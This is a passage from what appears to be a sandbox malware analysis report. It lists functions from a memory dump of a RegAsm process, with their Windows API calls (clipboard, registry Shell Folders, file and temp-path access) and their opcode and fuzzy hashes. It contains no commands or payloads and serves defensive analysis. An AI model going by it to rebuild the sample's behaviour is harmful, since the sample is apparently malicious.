                                                                                                                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3655998216-0
                                                                                                                                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00445426
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1828521557-0
                                                                                                                                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 609303285-0
                                                                                                                                                                                • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2081463915-0
                                                                                                                                                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2136311172-0
                                                                                                                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                                                • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3604893535-0
                                                                                                                                                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1213725291-0
                                                                                                                                                                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                • free.MSVCRT ref: 00418370
                                                                                                                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                • String ID: OsError 0x%x (%u)
                                                                                                                                                                                • API String ID: 2360000266-2664311388
                                                                                                                                                                                • Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                                                                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                • Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                                                                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                Function 0041183A Relevance: 3.0, APIs: 2, Instructions: 44clipboardCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                  • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                  • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2628231878-0
                                                                                                                                                                                • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
